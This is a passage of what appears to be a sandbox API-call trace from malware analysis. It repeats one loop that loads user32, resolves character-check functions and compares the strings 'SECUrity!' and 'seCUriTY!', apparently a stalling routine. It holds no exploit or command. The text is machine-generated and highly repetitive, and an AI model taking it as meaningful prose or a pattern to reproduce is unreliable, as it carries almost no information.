lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.239] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.239] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.239] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.239] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.239] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.239] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.240] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.240] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.240] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.240] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.240] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.240] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.240] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.240] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.240] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.240] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.240] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.240] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.240] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.240] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.240] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.240] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.240] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.240] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.240] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.240] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.240] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.240] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.241] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.241] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.241] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.241] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.241] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.241] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.241] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.241] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.241] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.241] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.241] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.241] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.241] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.241] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.241] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.241] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.241] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.241] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.241] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.241] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.241] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.242] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.242] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.242] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.242] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.242] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.242] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.242] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.242] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.242] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.242] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.242] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.242] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.242] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.242] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.242] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.242] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.242] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.242] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.242] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.242] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.242] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.243] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.243] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.243] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.243] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.243] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.243] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.243] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.243] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.243] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.243] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.243] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.243] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.243] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.243] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.243] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.243] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.243] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.243] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.243] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.243] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.243] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.244] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.244] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.244] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.244] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.244] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.244] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.244] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.244] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.244] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.244] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.244] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.244] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.244] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.244] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.244] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.244] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.244] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.244] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.244] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.244] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.244] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.245] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.245] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.245] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.245] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.245] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.245] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.245] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.245] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.245] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.245] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.245] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.245] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.245] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.245] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.245] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.245] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.245] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.246] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.246] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.246] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.246] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.246] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.246] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.246] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.246] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.246] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.246] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.246] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.246] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.246] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.246] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.247] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.247] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.247] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.247] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.247] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.247] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.247] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.247] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.247] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.247] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.247] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.247] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.247] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.247] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.248] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.248] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.248] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.248] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.248] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.248] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.248] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.248] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.248] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.248] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.248] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.248] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.248] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.248] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.248] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.249] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.249] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.249] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.249] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.249] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.249] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.249] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.249] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.249] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.249] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.249] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.249] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.249] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.249] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.249] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.249] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.250] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.250] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.250] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.250] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.250] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.250] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.250] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.250] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.250] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.250] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.250] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.250] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.250] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.250] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.250] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.250] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.250] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.251] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.251] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.251] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.251] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.251] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.251] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.251] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.251] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.251] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.251] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.251] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.251] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.251] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.251] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.251] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.251] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.251] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.251] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.251] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.251] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.251] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.252] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.252] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.252] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.252] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.252] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.252] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.252] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.252] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.252] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.252] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.252] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.252] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.252] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.252] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.252] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.252] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.252] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.252] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.252] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.252] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.252] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.252] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.253] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.253] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.253] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.253] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.253] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.253] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.253] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.253] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.253] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.253] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.253] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.253] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.253] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.253] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.253] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.253] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.254] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.254] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.254] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.254] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.254] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.254] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.254] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.254] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.254] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.254] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.254] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.254] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.254] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.254] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.255] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.255] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.255] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.255] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.255] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.255] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.255] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.255] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.255] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.255] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.255] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.255] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.255] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.255] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.255] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.255] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.256] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.256] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.256] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.256] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.256] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.256] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.256] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.256] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.256] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.256] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.256] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.256] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.256] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.256] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.256] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.256] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.256] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.256] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.256] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.256] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.257] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.257] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.257] GetProcAddress (hModule=0x75120000, lpProcName="IsCharLowerA") returned 0x75194e30 [0013.257] lstrcmpiA (lpString1="SECUrity!", lpString2="seCUriTY!") returned 0 [0013.257] LoadLibraryW (lpLibFileName="user32") returned 0x75120000 [0013.257] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericW") returned 0x75147792 [0013.257] GetProcAddress (hModule=0x75120000, lpProcName="IsCharAlphaNumericA") returned 0x75146867 [0013.257] 